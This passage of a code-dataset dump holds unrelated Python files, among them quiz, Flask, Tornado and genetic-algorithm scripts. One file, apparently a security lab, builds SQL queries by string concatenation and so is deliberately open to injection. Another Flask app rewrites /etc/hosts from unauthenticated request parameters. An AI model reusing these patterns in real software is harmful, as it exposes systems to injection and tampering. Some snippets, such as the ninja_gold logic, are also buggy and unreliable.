The\n# below code allows us to do that and also fake feeding data to the\n# call by updating the json text below.\nif __name__ == \"__main__\":\n sh = logging.StreamHandler()\n sh.setFormatter(\n logging.Formatter(\"%(asctime)s %(levelname)s %(name)s - %(message)s\")\n )\n logger.addHandler(sh)\n\n m = fedora_messaging.api.Message(\n topic=\"org.fedoraproject.prod.coreos.build.request.ostree-import\",\n body=EXAMPLE_MESSAGE_BODY,\n )\n c = Consumer()\n c.__call__(m)\n","sub_path":"coreos-ostree-importer/coreos_ostree_importer.py","file_name":"coreos_ostree_importer.py","file_ext":"py","file_size_in_byte":11212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"195580239","text":"import psycopg2\n\nclass Restaurant():\n\n def __init__(self, connection_string):\n self.conn = psycopg2.connect(connection_string)\n\n def find_ingredient(self, ingredient_name):\n query = \"SELECT * FROM ingredient WHERE ingredient='\" + ingredient_name + \"'\"\n with self.conn.cursor() as cursor:\n cursor.execute(query)\n return cursor.fetchall()\n\n def place_order(self, recipe):\n query = \"INSERT INTO orders(recipe) VALUES('\" + recipe + \"') RETURNING order_number\"\n with self.conn.cursor() as cursor:\n cursor.execute(query)\n self.conn.commit()\n return cursor.fetchone()[0]\n\n def fill_order(self, order_num):\n query = \"UPDATE orders SET filled=now() WHERE order_number='\" + order_num + \"'\"\n with self.conn.cursor() as cursor:\n cursor.execute(query)\n self.conn.commit()\n return cursor.rowcount\n\n def find_course_recipes(self, course):\n query = \"SELECT recipe FROM recipe WHERE experimental = FALSE AND course = '\" + course + \"'\"\n with self.conn.cursor() as cursor:\n cursor.execute(query)\n return cursor.fetchall()\n\n def find_ingredient_better(self, ingredient_name):\n query = \"SELECT ingredient FROM ingredient WHERE ingredient = '%s'\" % (ingredient_name,)\n with self.conn.cursor() as cursor:\n cursor.execute(query)\n return cursor.fetchall()\n\n def find_ingredients_by_cost(self, course):\n # Sanitize user input to properly escape strings\n course = course.replace('\\'', '\\\\\\'')\n query = \"SELECT * FROM ingredient WHERE cost_per_unit > {}\".format(course)\n with self.conn.cursor() as cursor:\n cursor.execute(query)\n return cursor.fetchall()","sub_path":"labs/lab6/vulnerable_restaurant.py","file_name":"vulnerable_restaurant.py","file_ext":"py","file_size_in_byte":1806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"213265897","text":"# nx: threaded\n\nfrom GeneticAlgorithm import *\nfrom utilitiesA2 import *\nfrom lamp import Lamp\n\nimport math\nimport random\nimport numpy as np\n\nfrom shapes.cylinder import Cylinder\nfrom shapes.sphere import Sphere\n\nimport NXOpen\nimport NXOpen.Annotations\nimport NXOpen.Features\nimport NXOpen.GeometricUtilities\nimport NXOpen.Preferences\n\ndef main():\n\n##################################__PARAMETERS__##########################################\n\n #Target point \n target = np.array([100,100,100])\n\n #Define some initial directional parameters\n base_origin = np.array([0,0,0]) #Where lamp base is placed in the 3D-space\n base_vector = np.array([0,0,1]) #Lamp direction\n\n #How many legs should the lamp have?\n number_of_legs = 4\n number_of_joints = number_of_legs + 1\n\n #Number of lampcopies to perform selection on\n number_of_lamps = 8\n\n #Generational limits and parameteres\n max_generations = 30\n success_criteria = 10\n\n #Some 
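Every query in the `Restaurant` class above is assembled by string concatenation or `%`-formatting — including `find_ingredient_better`, which merely moves the interpolation into `%`, and `find_ingredients_by_cost`, whose quote-escaping "sanitization" does nothing for a value dropped into a numeric comparison via `.format`. The standard psycopg2 fix is to pass parameters separately so the driver escapes them; a hedged sketch of one method rewritten that way (hypothetical method name):

```python
def find_ingredient_safe(self, ingredient_name):
    # Parameterized query: psycopg2 substitutes %s safely, so a quote
    # inside ingredient_name cannot terminate the SQL string.
    query = "SELECT * FROM ingredient WHERE ingredient = %s"
    with self.conn.cursor() as cursor:
        cursor.execute(query, (ingredient_name,))
        return cursor.fetchall()
```

The same `cursor.execute(sql, params)` shape applies to the `INSERT` and `UPDATE` methods as well.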
general initial values\n initial_leg_length = 30\n leg_diameter = 5\n joint_diameter = leg_diameter * 1 #Multiply by a constant\n base_leg_angle = 45 #Angle of first leg (degrees)\n general_leg_angle = 45 #Angle of all other legs\n base_diameter = 40\n base_height = 10\n hood_diameter = 30.\n hood_thickness = 2\n hood_cutoff_factor = 0.8\n hood_cutoff_length = hood_diameter * hood_cutoff_factor #Where the lamp head opens in reference to its leg-connection\n hood_direction = np.array([-1,0,0]) #The direction of the first hood.\n \n #Optional settings\n allow_joint_turn = True\n allow_head_turn = True\n allow_base_change = False #Fix base in position or not\n allow_mutations = True\n mutation_range = 0.8 #How much percentwise a leg can mutate in one generation\n generations = 30 #False or an int!\n randomize_initial_creation = True #Mutate all parameteres of first lamp \n\n\n\n##################################__PROCEDURE__##########################################\n\n #SETUP INITIAL LAMP\n lamp = Lamp(origin = base_origin, base_vector = base_vector) #Instantiate lamp object\n lamp.generate_initial_base(base_height, base_diameter) #Generate Base\n #Generate legs:\n lamp.generate_initial_legs(number_of_legs, \n leg_diameter, \n joint_diameter,\n initial_leg_length,\n base_leg_angle,\n general_leg_angle,\n randomize_leg_height = False,\n randomize_leg_angle = False,\n randomize_leg_twist = False,\n )\n\n lamp.generate_initial_hood(hood_diameter,\n hood_thickness,\n hood_cutoff_length,\n hood_cutoff_factor,\n hood_direction,\n randomize_initial_vector = True)\n\n #SETUP GENETIC ALGORITHM\n GA = GeneticAlgorithm(allow_joint_turn = allow_joint_turn,\n allow_head_turn = allow_head_turn,\n allow_base_change = allow_base_change,\n allow_mutations = allow_mutations,\n generations = generations,\n mutation_range = mutation_range\n )\n\n #Mutate first lamp\n if randomize_initial_creation == True:\n GA.mutate(lamp, mutation_range_high = 0.8, mutation_range_low = 0.3, mutation_odds = 1)\n\n #Create new lamps\n lamplist = GA.createNewInstances(lamp, number_of_lamps)\n\n #Mutate all new lamps to create different initial lamps with different properties\n for lamp_x in lamplist:\n GA.mutate(lamp_x, mutation_range_high = 0.8, mutation_range_low = 0.3, mutation_odds = 0.1)\n\n #Perform selection and select the best lamp satisfying the requirements\n best_lamp = GA.perform_selection(lamplist, target, max_generations, success_criteria)\n\n\n #Generate target in NX\n target_sphere = Sphere(target, success_criteria, color = \"RED\")\n target_sphere.initForNX()\n \n #Generate final lamp in NX\n best_lamp.generateInNX()\n\nmain()","sub_path":"python/Genetic algorithms/assignment2.py","file_name":"assignment2.py","file_ext":"py","file_size_in_byte":3792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"246653653","text":"# pylint: disable = redefined-outer-name\n\nimport pathlib\nimport git\nimport pytest\n\nfrom . 
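The target point plus `success_criteria` radius (also used to size the red target `Sphere`) suggests a distance-based selection criterion. A purely hypothetical fitness of that shape — the internals of `GeneticAlgorithm.perform_selection` are not shown here, so this only illustrates the apparent contract, assuming Euclidean distance to the target is what is minimized:

```python
import numpy as np

def distance_fitness(lamp_tip, target, success_radius):
    # Hypothetical: distance from the lamp head to the target point; a
    # lamp "succeeds" once its tip falls inside the success sphere.
    dist = float(np.linalg.norm(np.asarray(lamp_tip) - np.asarray(target)))
    return dist, dist <= success_radius

dist, ok = distance_fitness([95, 98, 104], [100, 100, 100], 10)
assert ok  # sqrt(25 + 4 + 16) ~= 6.7 <= 10
```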
import utils\nfrom .git_utils import GitClient, GitTestEnvironment\nfrom .perforce_utils import PerforceWorkspace, P4TestEnvironment\n\n\n@pytest.fixture\ndef unicode_dir(tmp_path: pathlib.Path):\n unicode_dir_path = tmp_path / \"Юніко́д з пробелами\"\n unicode_dir_path.mkdir()\n yield unicode_dir_path\n\n\n@pytest.mark.parametrize(\"vcs\", [\"git\", \"p4\"])\n@pytest.mark.parametrize(\"test_type\", [\"main\", \"poll\", \"submit\"])\ndef test_unicode(vcs, test_type, perforce_workspace: PerforceWorkspace, git_client: GitClient, unicode_dir: pathlib.Path):\n env: utils.BaseTestEnvironment\n if vcs == \"git\":\n # change git client root dir to unicode path\n work_dir = unicode_dir / \"client\"\n work_dir.mkdir()\n git_client.repo = git.Repo.clone_from(git_client.server.url, work_dir)\n git_client.root_directory = work_dir\n\n env = GitTestEnvironment(git_client, unicode_dir, test_type=test_type)\n elif vcs == \"p4\":\n # change workspace root dir to unicode path\n root = unicode_dir / \"workspace\"\n root.mkdir()\n client = perforce_workspace.p4.fetch_client(perforce_workspace.client_name)\n client[\"Root\"] = str(root)\n perforce_workspace.root_directory = root\n perforce_workspace.p4.save_client(client)\n perforce_workspace.p4.run_sync(\"-f\", \"//depot/...\")\n\n env = P4TestEnvironment(perforce_workspace, unicode_dir, test_type=test_type)\n else:\n assert False, \"Unsupported vcs type\"\n\n if test_type == \"submit\":\n file_name = utils.randomize_name(\"new_file\") + \".txt\"\n temp_file = env.vcs_client.root_directory / file_name\n temp_file.write_text(\"This is a new file\" + \"\\n\")\n env.settings.Submit.reconcile_list = str(temp_file)\n\n env.run()\n\n\ndef test_unicode_main_local_vcs(unicode_dir: pathlib.Path):\n work_dir = unicode_dir / \"local_sources\"\n work_dir.mkdir()\n (work_dir / \"source_file\").write_text(\"Source file contents\")\n\n env = utils.LocalTestEnvironment(unicode_dir, \"main\")\n env.settings.Vcs.type = \"none\"\n env.settings.LocalMainVcs.source_dir = str(work_dir)\n\n env.run()\n","sub_path":"tests/test_unicode.py","file_name":"test_unicode.py","file_ext":"py","file_size_in_byte":2231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"52802817","text":"#Задача: подготовить систему консольного тестирования сотрудника на 10 вопросов\n\n#FIX:\n#Вопросы должны меняться местами от запуска к запуску - fix\n#Один верный ответ - один балл - fix\n#Вариант реализации: показывается сколько правильных и сколько неправильных ответов дано - fix\n#Определение правильного ответа происходит каждый раз при открытии вопрос и ответов к нему. Позволит при перемешивании ответов находить правильный ответ. - fix\n#в конце показывать прошел или нет - fix\n#система перемешивает ответы - fix\n\n#система должна показывать в каких вопросах была ошибка\n#Возможность использовать вопросы с несколькими вариантами ответа. - вариант: сделать тип вопроса? сделать два списка вопросов один с 1 ответом. 
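The `unicode_dir` fixture works because `pathlib` treats non-ASCII directory names with spaces like any other path component, provided the filesystem encoding cooperates. The same idea outside of pytest:

```python
import pathlib
import tempfile

base = pathlib.Path(tempfile.mkdtemp())
unicode_dir = base / "Юніко́д з пробелами"  # same name the fixture uses
unicode_dir.mkdir()
(unicode_dir / "file.txt").write_text("contents", encoding="utf-8")
assert (unicode_dir / "file.txt").read_text(encoding="utf-8") == "contents"
```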
1 с несколькими.\n#Возможность заливки вопросов в систему через csv или txt\n#Проверку вводимых ответов - должны быть только цифры от 1 до 9 (больше 9 не будет вариантов ответа) - варианты: перехват ошибки (символ отличный от цифр или пустое ничего\" либо ограничения по количеству вводимых\n#Нужно чтобы система записывала и хранила результаты прошедшего тестирования\n\n\nlist_of_questions = [[{'Предмет информатики — это': ('язык программирования','устройство робота','способы накопления, хранения, обработки, передачи информации')}],\n [{'Тройками из нулей и единиц можно закодировать _ различных символов.':(6, 8, 5, 9)}],\n [{'Капитан спрашивает матроса: «Работает ли маяк?» Матрос отвечает: «То загорается, то погаснет!» Чем является маяк в этой ситуации?':\n ('Получателем информации','источником информации','каналом связи','помехой')}],\n [{'В каком веке появились первые устройства, способные выполнять арифметические действия?':('В XVI в.', 'В XVII в.', 'В XVIII в.', 'В XIX в.')}],\n [{'Механическое устройство, позволяющее складывать числа, изобрел:':('П. Нортон', 'Б. Паскаль', 'Г. Лейбниц', 'Д. Нейман')}],\n [{'Для какой системы счисления были приспособлены первые семикосточковые счеты?':('Для семеричной', 'для двоичной', 'для десятичной', 'для унарной')}],\n [{'Выберите все правильные ответы:':('Солнце - светит','Дождь сухой','Курить - вредно','Медведи летают')}]]\n\n\ndict_of_true_answers = {'Предмет информатики — это': 'способы накопления, хранения, обработки, передачи информации',\n 'Тройками из нулей и единиц можно закодировать _ различных символов.':8,\n 'Капитан спрашивает матроса: «Работает ли маяк?» Матрос отвечает: «То загорается, то погаснет!» Чем является маяк в этой ситуации?':'источником информации',\n 'В каком веке появились первые устройства, способные выполнять арифметические действия?':'В XVII в.',\n 'Механическое устройство, позволяющее складывать числа, изобрел:':'Б. Паскаль',\n 'Для какой системы счисления были приспособлены первые семикосточковые счеты?':'для десятичной', 'Выберите все правильные ответы:':('Солнце - светит','Курить - вредно')}\n\nfrom random import randrange\n\ndef main():\n pass\n\ndef sayHelloAskName():\n print('Добро пожаловать в систему тестирования! 
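The quiz above stores each question as a single-item list wrapping a one-key dict, with the correct answers in a separate parallel dictionary keyed by question text — which is why `findTrueAnswer` has to rediscover the right option index on every display. A flatter shape keeps each question's options and correct answers together (illustrative English sample, not a translation of the full quiz):

```python
# One record per question; the correct answers live alongside the
# options instead of in a parallel dictionary keyed by question text.
QUESTIONS = [
    {
        "text": "The subject of computer science is:",
        "options": ("a programming language",
                    "robot hardware",
                    "ways of storing, processing and transmitting information"),
        "correct": {"ways of storing, processing and transmitting information"},
    },
]

q = QUESTIONS[0]
assert q["correct"] <= set(q["options"])  # correct answers must be options
```

A set-valued `correct` field also covers the multi-answer question type the TODO comments above ask for.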
Как Вас зовут?')\n name = input()\n return name\n\ndef chooseQuestions(list_of_questions):\n numbers_of_choose_questions = []\n question_list_for_person = []\n kolichestvo_otbiraemih_voprosof = 3\n while len(numbers_of_choose_questions) != kolichestvo_otbiraemih_voprosof:\n random_number = randrange(0, len(list_of_questions))\n if random_number not in numbers_of_choose_questions:\n numbers_of_choose_questions.append(random_number)\n for i in numbers_of_choose_questions:\n question_list_for_person.append(list_of_questions[i])\n return question_list_for_person\n\ndef shuffle_questions(list_of_questions): #ДЕЛАЕМ ПЕРЕМЕШИВАНИЕ СПИСКА ВОПРОСОВ - можно сохранять последнюю комбинацию вопросов и не выдавать такую же (как вариант)\n shuffle_numbers = []\n question_list_for_person = []\n while len(shuffle_numbers) != len(list_of_questions):\n random_number = randrange(0,len(list_of_questions))\n if random_number not in shuffle_numbers:\n shuffle_numbers.append(random_number)\n# print(shuffle_numbers)\n for i in shuffle_numbers:\n question_list_for_person.append(list_of_questions[i])\n print(question_list_for_person)\n return question_list_for_person\n\n\ndef shuffle_answers_in_questions(list_of_questions):\n for i in range(len(list_of_questions)):\n for j in range(len(list_of_questions[i])):\n for key, values in list_of_questions[i][j].items():\n shuffle_numbers = []\n shuffle_answers = []\n values = list(values)\n while len(shuffle_numbers) != len(values):\n random_number = randrange(0,len(values))\n if random_number not in shuffle_numbers:\n shuffle_numbers.append(random_number)\n print(shuffle_numbers)\n for t in shuffle_numbers:\n shuffle_answers.append(values[t])\n values = []\n for k in shuffle_answers:\n values.append(k)\n list_of_questions[i][j][key] = tuple(values)\n return list_of_questions \n\ndef sayYourAnswer():\n pass\n\ndef findTrueAnswer(key_question, variant_otveta, number_vatiant_otveta, number_of_true_answer): #key_question - сам вопрос\n if variant_otveta == dict_of_true_answers[key_question]:\n number_of_true_answer = number_vatiant_otveta \n# print(variant_otveta, dict_of_true_answers[key_question], number_vatiant_otveta, number_of_true_answer)\n return number_of_true_answer\n else:\n return number_of_true_answer\n\ndef findTrueAnswer_ManyAnswers(key_questions, variant_otveta, number_variant_otveta, number_of_true_answer):\n pass\n \n\ndef isYourAnswerTrue(number_of_true_answer, answer):\n global counter_of_true_answers\n if number_of_true_answer == answer:\n print('Это правильный ответ!')\n counter_of_true_answers = countTrueAnswers(counter_of_true_answers)\n else:\n print('Это НЕправильный ответ!')\n\ndef countTrueAnswers(counter_of_true_answers):\n counter_of_true_answers = counter_of_true_answers + 1\n return counter_of_true_answers\n\ndef showResults(counter_of_true_answers):\n print(f'{name}, Вы набрали {counter_of_true_answers} баллов из {len(list_of_questions)}')\n\n# ВОТ ЗДЕСЬ НАЧАЛО ПРОГРАММЫ\n\nlist_of_questions = chooseQuestions(list_of_questions)\nlist_of_questions = shuffle_questions(list_of_questions)\nlist_of_questions = shuffle_answers_in_questions(list_of_questions)\n\n#определение номеров правильных ответов\n#Печать вопросов, снятие ответов от сотрудника\n\nname = sayHelloAskName()\nprint(f'{name}, тебе предстоит ответить на несколько вопросов. В тесте их {len(list_of_questions)}! В каждом вопросе есть только один правильный ответ. 
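`chooseQuestions`, `shuffle_questions`, and `shuffle_answers_in_questions` all draw random indices in a rejection loop until none repeat; the standard library expresses both operations directly. A hedged simplification sketch (the quiz's nested list/dict shape would still apply around it):

```python
import random

def choose_questions(questions, k=3):
    # random.sample picks k distinct items in one call, replacing the
    # "draw indices until there are no repeats" loop above.
    return random.sample(questions, k)

def shuffle_copy(items):
    # random.shuffle permutes in place; shuffling a copy matches the
    # behaviour of building a new reordered list.
    shuffled = list(items)
    random.shuffle(shuffled)
    return shuffled
```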
Желаем удачи!')\nprint()\n\nnumber_question = 1\ncounter_of_true_answers = 0\n\nfor first_level in list_of_questions:\n for second_level in first_level:\n for key_question,spisok_otvetov in second_level.items():\n print(number_question, '.', key_question, sep = '')\n number_question = number_question + 1\n number_vatiant_otveta = 1\n number_of_true_answer = ''\n for variant_otveta in spisok_otvetov:\n print(number_vatiant_otveta,'.', variant_otveta, sep = '')\n if number_of_true_answer == '':\n number_of_true_answer = findTrueAnswer(key_question, variant_otveta, number_vatiant_otveta, number_of_true_answer)\n number_vatiant_otveta = number_vatiant_otveta + 1\n# print(number_of_true_answer)\n answer = int(input('Введите номер ответа: '))\n# print(answer, number_of_true_answer)\n isYourAnswerTrue(number_of_true_answer, answer)\n print()\nshowResults(counter_of_true_answers)\n\n","sub_path":"Платформа тестирования/old/Платфор��а тестирования v2.py","file_name":"Платформа тестирования v2.py","file_ext":"py","file_size_in_byte":10505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"350354561","text":"while True:\n c = input().split()\n n, x = int(c[0]), int(c[1])\n if n == x == 0:\n break\n count = 0\n for i in range(1, n + 1):\n for j in range(i + 1, n + 1):\n for k in range(j + 1, n + 1):\n if i + j + k == x:\n count += 1\n print(count)\n","sub_path":"task19.py","file_name":"task19.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"396116019","text":"# coding: utf-8\n\nimport logging\nimport json\nimport constants\nimport config\nfrom .BaseHandler import BaseHandler\nfrom utils.response_code import RET\nfrom utils.common import require_logined\n\n\nclass AreaInfoHandler(BaseHandler):\n \"\"\"\"\"\"\n def get(self):\n try:\n ret = self.redis.get(\"area_info\")\n except Exception as e:\n logging.error(e)\n ret = None\n if ret:\n data = '{\"errno\": %s, \"errmsg\": \"OK\", \"data\": %s}' % (RET.OK, ret)\n logging.info(\"hit redis cache: area info\")\n return self.write(data)\n # fetch data from MySQL\n try:\n ret = self.db.query(\"select ai_area_id, ai_area_name from ih_area_info\")\n except Exception as e:\n logging.error(e)\n return self.write(dict(errno=RET.DBERR, errmsg=\"get data error\"))\n if not ret:\n return self.write(dict(errno=RET.NODATA, errmsg=\"no area data\"))\n areas = []\n for l in ret:\n area = {\n \"area_id\": l[\"ai_area_id\"],\n \"area_name\": l[\"ai_area_name\"]\n }\n areas.append(area)\n try:\n self.redis.setex(\"area_info\", constants.AREA_INFO_REDIS_EXPIRES_SECONDS, json.dumps(areas))\n except Exception as e:\n logging.error(e)\n self.write(dict(errno=RET.OK, errmsg=\"OK\", data=areas))\n\n\nclass MyHouseHandler(BaseHandler):\n @require_logined\n def get(self):\n user_id = self.session.data.get(\"user_id\")\n try:\n sql = \"select a.hi_house_id,a.hi_title,a.hi_price,a.hi_ctime,b.ai_name,a.hi_index_image_url \" \\\n \"from ih_house_info a inner join ih_area_info b on a.hi_area_id=b.ai_area_id where a.hi_user_id=%s;\"\n ret = self.db.query(sql, user_id)\n except Exception as e:\n logging.error(e)\n return self.write({\"errno\": RET.DBERR, \"errmsg\": \"get data erro\"})\n houses = []\n if ret:\n for l in ret:\n house = {\n \"house_id\": l[\"hi_house_id\"],\n \"title\": l[\"hi_title\"],\n \"price\": l[\"hi_price\"],\n \"ctime\": l[\"hi_ctime\"].strftime(\"%Y-%m-%d\"),\n \"area_name\": l[\"ai_name\"],\n \"img_url\": 
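The triple-loop counter above (`task19.py`) enumerates all `i < j < k` from `1..n` and counts sums equal to `x`; `itertools.combinations` generates exactly those index triples:

```python
from itertools import combinations

def count_triples(n, x):
    # Equivalent to the nested loops above: distinct i < j < k drawn
    # from 1..n whose sum equals x.
    return sum(1 for t in combinations(range(1, n + 1), 3) if sum(t) == x)

assert count_triples(5, 9) == 2  # (1, 3, 5) and (2, 3, 4)
```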
config.img_url_prefix + l[\"hi_index_image_url\"] if l[\"hi_index_image_url\"] else \"\"\n }\n houses.append(house)\n self.write(dict(errno=RET.OK, errmsg=\"OK\", houses=houses))\n","sub_path":"handlers/House.py","file_name":"House.py","file_ext":"py","file_size_in_byte":2516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"20468918","text":"#!/usr/bin/python3\nfrom flask import Flask\nfrom flask import request\nimport re\napp = Flask(__name__)\n\n\n@app.route('/')\ndef update_hosts():\n \"\"\"\n update the given hosts IP address in /etc/hosts\n \"\"\"\n ip = request.args.get('ip')\n hostname = request.args.get('hostname')\n filename = \"/etc/hosts\"\n\n old_lines = open(filename).read().splitlines()\n\n new_lines = [\n \"{} {}\".format(ip, hostname)\n if re.search(hostname, x, re.IGNORECASE) else x for x in old_lines\n ]\n\n content = \"\\n\".join(new_lines)\n\n with open(filename, \"w\") as text_file:\n text_file.write(content)\n\n return content\n\n\napp.run(host='0.0.0.0', port=5333)\n","sub_path":"linux/scripts/hosts_updater.py","file_name":"hosts_updater.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"635025236","text":"from flask import Flask, render_template, request, redirect, session\nfrom random import randint\napp = Flask(__name__)\n\napp.secret_key = 'places' \n\n@app.route('/')\ndef outcomes():\n if 'gold' not in session:\n session['gold'] = 0\n if 'activities' not in session:\n session['activities'] = []\n return render_template('ninja_gold.html')\n@app.route('/process_money', methods=['POST'])\ndef process():\n places = {\n 'farm': randint(-20,5),\n 'casino': randint(-50,50),\n 'cave': randint(0,30),\n 'house': randint(0,5)\n }\n if request.form['place'] in places:\n result = places[request.form['place']]\n session['gold'] = session['gold']+result\n result_dictionary = {\n 'class': \"green\" if result > 0 else \"red\",\n 'activity': \"you went to the {} and {} {} gold!\".format(request.form[\"place\"],\n (\"lost\", \"gained\", [result > 0]), result)}\n \n session['activities'].append(result_dictionary)\n return redirect('/')\n@app.route('/process_money', methods=[\"POST\"])\ndef play_again():\n session.clear()\n\napp.run(debug=True)","sub_path":"python/my_environments/flask/ninjaGold/ninja_gold.py","file_name":"ninja_gold.py","file_ext":"py","file_size_in_byte":1151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"467070478","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport os\nimport json\nimport mimetypes\nimport cgi\nimport os.path\n\nclass Worker():\n\n def __init__(self, http_handler, route_params, url_query):\n\n # Keep handler to get more data\n self.http_handler = http_handler\n\n # Request data\n self.request_headers = http_handler.headers\n self.route_params = route_params\n self.url_query = url_query\n\n # e.g: ?key=value_1&key=value_2\n # self.url_query = dict(parse.parse_qs(url_query_str)) # {\"key\":[\"value_1\", \"value_2\"]}\n# self.url_query = dict(parse.parse_qs(url_query_str)) # {\"key\": \"value_2\"}\n\n def get_request_header(self, key, default=None):\n return self.request_headers.get(key, default)\n\n def get_route_param(self, key, default=None):\n return self.route_params.get(key, default)\n\n def get_url_query(self, key, default=None):\n result = self.url_query.get(key)\n if result == None:\n return result\n\n if len(result) == 
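The hosts updater above passes the raw `hostname` query parameter to `re.search`, so the dots in a name like `web.example.com` match any character and unrelated lines can be rewritten. Escaping the name and anchoring on word boundaries is safer; a hedged sketch of the matching predicate:

```python
import re

def line_matches_host(line: str, hostname: str) -> bool:
    # re.escape keeps the dots literal; \b stops "example.com" from
    # also matching inside "myexample.com".
    pattern = r"\b" + re.escape(hostname) + r"\b"
    return re.search(pattern, line, re.IGNORECASE) is not None

assert line_matches_host("10.0.0.5 web.example.com", "web.example.com")
assert not line_matches_host("10.0.0.5 webXexample.com", "web.example.com")
```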
1:\n return result[0]\n else:\n return result\n\n\n def format_message(self, code, message=None, data=None):\n output = {\n 'status' : code,\n 'message' : message,\n 'data' : data,\n }\n return json.dumps(output)\n\n def debug(self, message):\n self.http_handler.send_debug_message(message + \"\\n\")\n\n\n def addResponseHeader(self, header, value):\n self.http_handler.response_headers[header] = value\n\n\n def responseOK(self, data='', message='OK'):\n self.http_handler.send_message(200, message=message, data=data)\n\n\n def response(self, data):\n pass\n\n def responseError(self, error_code, message='', data=''):\n self.http_handler.send_error(error_code, message, data)\n\n\n def responseFile(self, file_path, block_size=2048):\n mime_type = mimetypes.guess_type(file_path)[0]\n size = os.stat(file_path).st_size\n\n with open(file_path, 'rb') as f:\n self.http_handler.send_headers(200)\n while True:\n data = f.read(block_size)\n if data:\n self.http_handler.send_data(data)\n else:\n break\n f.closed\n\n\n def getRequestBody(self):\n content_length = int(self.request_headers.get('Content-Length', 0))\n if content_length == 0:\n return None\n\n content_type = self.request_headers.get('Content-Type', '')\n if content_type == '':\n return None\n\n ctype, pdict = cgi.parse_header(content_type)\n\n if ctype == 'multipart/form-data':\n result = None\n form = cgi.FieldStorage(fp=self.http_handler.rfile,\n headers=self.http_handler.headers,\n environ={\n 'REQUEST_METHOD':self.http_handler.command,\n 'CONTENT_TYPE':content_type\n })\n # Parse data to dict\n for key in form:\n payload = form[key]\n if type(payload) is list:\n for item in payload:\n if result:\n data = {}\n data['file_name'] = item.filename\n data['name'] = item.name\n data['content'] = item.value\n result.append(data)\n else:\n result= []\n data = {}\n data['file_name'] = item.filename\n data['name'] = item.name\n data['content'] = item.value\n result.append(data)\n else:\n if result:\n data = {}\n data['file_name'] = payload.filename\n data['name'] = payload.name\n data['content'] = payload.value\n result.append(data)\n else:\n result= []\n data = {}\n data['file_name'] = payload.filename\n data['name'] = payload.name\n data['content'] = payload.value\n result.append(data)\n\n return result\n\n # application/x-www-form-urlencoded can be complex ...\n # Just return for developer to parse :)\n return self.http_handler.rfile.read(content_length)\n","sub_path":"server/worker.py","file_name":"worker.py","file_ext":"py","file_size_in_byte":4677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"218158147","text":"from Gaudi.Configuration import *\nfrom Configurables import ApplicationMgr, HepMCReader, HepMCDumper, FCCDataSvc\n\nalbersevent = FCCDataSvc(\"EventDataSvc\")\n\nreader = HepMCReader(\"Reader\", Filename=\"example_MyPythia.dat\")\nreader.DataOutputs.hepmc.Path = \"hepmc\"\n\nfrom Configurables import HepMCConverter\nhepmc_converter = HepMCConverter(\"Converter\")\nhepmc_converter.DataInputs.hepmc.Path=\"hepmc\"\nhepmc_converter.DataOutputs.genparticles.Path=\"allGenParticles\"\nhepmc_converter.DataOutputs.genvertices.Path=\"allGenVertices\"\n\nfrom Configurables import GeoSvc\ngeoservice = GeoSvc(\"GeoSvc\", detector='file:DetectorDescription/Detectors/compact/TestTracker.xml',\n OutputLevel = DEBUG)\n\nfrom Configurables import GeantSvc, GdmlDetector\ndet = GdmlDetector(\"GdmlDetector\", gdml = \"Sim/SimG4Common/gdml/example.xml\")\ngeantservice = GeantSvc(\"GeantSvc\", 
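The multipart branch of `getRequestBody` repeats the same three-field dict construction four times and re-creates `result` inside the loop. The four branches collapse into one normalization step; a hedged refactor sketch with a stand-in object so the snippet runs without a live `cgi.FieldStorage`:

```python
from types import SimpleNamespace

def _part_to_dict(part):
    # One place to convert a form part into the dict shape used above.
    return {"file_name": part.filename, "name": part.name,
            "content": part.value}

def parts_to_list(form):
    # Every key may hold a single part or a list of parts; normalize
    # both cases to one flat list of dicts.
    result = []
    for key in form:
        payload = form[key]
        items = payload if isinstance(payload, list) else [payload]
        result.extend(_part_to_dict(item) for item in items)
    return result

fake = {"f": SimpleNamespace(filename="a.txt", name="f", value=b"data")}
assert parts_to_list(fake)[0]["file_name"] == "a.txt"
```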
config=\"GeantFullSimConfig\", detector=\"GdmlDetector\")\ngeantservice.addTool(det)\n\nfrom Configurables import GeantFullSimAlg\ngeantsim = GeantFullSimAlg(\"GeantFullSimAlg\")\ngeantsim.DataInputs.genParticles.Path=\"allGenParticles\"\ngeantsim.DataOutputs.trackClusters.Path = \"clusters\"\ngeantsim.DataOutputs.trackHits.Path = \"hits\"\ngeantsim.DataOutputs.trackHitsClusters.Path = \"hitClusterAssociation\"\n\n\nfrom Configurables import AlbersWrite, AlbersOutput\nout = AlbersOutput(\"out\",\n OutputLevel=DEBUG)\nout.outputCommands = [\"keep *\"]\n\nApplicationMgr( TopAlg = [reader, hepmc_converter, geantsim, out],\n EvtSel = 'NONE',\n EvtMax = 1,\n ExtSvc = [albersevent, geoservice, geantservice], # order! geo needed by geant\n OutputLevel=DEBUG\n )\n","sub_path":"config/geant_fullsim_gdml.py","file_name":"geant_fullsim_gdml.py","file_ext":"py","file_size_in_byte":1666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"433080945","text":"import requests\nimport csv\nimport os\n#import matplotlib.pyplot as plt\n#import mpld3\nimport progressbar\nfrom Character import Character\nfrom Team import Team\n\ndef getMinCharacterPoints(characterList):\n return min([characterList[x].getPoints() for x in range(0, len(characterList))])\n\ndef addProtoCharacters(fileName, characterList, affil):\n with open(fileName, 'r+', newline = '') as csvFile:\n swdReader = csv.reader(csvFile)\n next(swdReader)\n for row in swdReader:\n tempSides = [row[index] 